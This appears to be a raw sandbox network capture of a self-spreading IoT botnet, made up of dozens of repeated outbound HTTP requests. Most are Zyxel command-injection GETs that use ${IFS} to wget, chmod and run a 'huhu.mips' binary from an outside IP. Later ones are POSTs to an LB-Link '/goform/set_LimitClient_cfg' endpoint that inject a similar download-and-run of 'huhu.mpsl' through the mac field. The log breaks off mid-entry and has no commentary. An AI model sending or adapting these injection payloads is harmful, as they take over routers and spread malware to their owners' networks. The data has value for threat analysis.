                                              Jan 29, 2024 07:03:59.194080114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6727192.168.2.144025698.120.144.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194132090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6728192.168.2.1459292105.20.165.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194154024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6729192.168.2.145830483.100.247.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194199085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6730192.168.2.1433466128.115.138.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194245100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6731192.168.2.1443434165.175.23.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194289923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6732192.168.2.144884874.196.205.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194317102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6733192.168.2.145499297.134.248.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194343090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6734192.168.2.1442628142.147.240.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194396019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6735192.168.2.1454360219.204.10.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194462061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6736192.168.2.1449312147.10.103.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194497108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6737192.168.2.144269050.31.131.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194541931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6738192.168.2.144817635.110.224.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194561958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6739192.168.2.1435254121.25.189.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194624901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6740192.168.2.1454380218.95.37.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194654942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6741192.168.2.1434980103.114.158.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194679022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6742192.168.2.145912070.108.113.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194739103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6743192.168.2.1443966134.150.158.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194778919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6744192.168.2.1444858158.53.198.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194830894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6745192.168.2.1450304136.191.17.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194859982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6746192.168.2.1460048197.238.145.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194905996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6747192.168.2.143368651.49.221.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194927931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6748192.168.2.144159870.49.155.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194973946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6749192.168.2.1435590184.234.123.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194996119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6750192.168.2.145468835.112.28.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195049047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6751192.168.2.1458916135.103.212.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195090055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6752192.168.2.145035250.60.218.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195108891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6753192.168.2.1447404172.231.209.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195139885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6754192.168.2.143830266.69.11.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195168018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6755192.168.2.144836888.87.8.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195205927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6756192.168.2.1437294122.105.122.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195259094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6757192.168.2.145562225.173.143.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195300102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6758192.168.2.145690431.88.49.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195362091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6759192.168.2.1451230175.14.153.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195394993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6760192.168.2.1454582218.189.51.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195422888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6761192.168.2.1444090126.184.190.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195461988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6762192.168.2.1437448190.149.18.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195512056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6763192.168.2.1455636206.187.108.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195549965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6764192.168.2.143856696.99.198.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195600986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6765192.168.2.1459108185.104.125.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195641041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6766192.168.2.145012082.116.121.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195707083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6767192.168.2.145906861.202.250.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195729017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6768192.168.2.145993834.88.31.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195766926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6769192.168.2.1441062176.68.189.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195791006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6770192.168.2.1445936201.150.78.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195852995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6771192.168.2.1447770139.10.201.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195892096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6772192.168.2.1460422160.93.38.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195909977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6773192.168.2.1438888144.100.97.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195954084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6774192.168.2.1458982175.53.152.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.195976973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6775192.168.2.144653695.188.187.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.196017981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6776192.168.2.1443024206.199.145.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.196069956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6777192.168.2.1460894168.109.108.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.196101904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6778192.168.2.1453212104.20.33.78080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.060435057 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:04:00.177287102 CET328INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 29 Jan 2024 06:04:00 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6779192.168.2.145394045.60.151.1658080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.161998987 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6780192.168.2.1453630187.106.189.428080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.189697027 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6781192.168.2.1440378210.27.52.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.206576109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6782192.168.2.144852039.209.233.93443
                                              TimestampBytes transferredDirectionData
